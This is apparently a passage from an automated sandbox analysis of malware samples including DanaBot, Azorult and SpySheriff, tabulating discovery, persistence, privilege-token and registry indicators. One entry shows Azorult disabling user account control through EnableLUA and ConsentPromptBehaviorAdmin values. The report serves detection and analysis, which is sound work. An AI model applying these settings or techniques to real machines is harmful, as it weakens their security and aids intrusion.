| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\SpySheriff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\rdp\Rar.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\rdp\RDPWInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\SpySheriff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921237954079128" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{BA141F2C-3A75-459F-A01F-78DB12628BC1} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\MIME\Database | C:\ProgramData\Windows\winit.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\ProgramData\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20250322_162339.webp
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x314,0x7ffb204ef208,0x7ffb204ef214,0x7ffb204ef220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1732,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
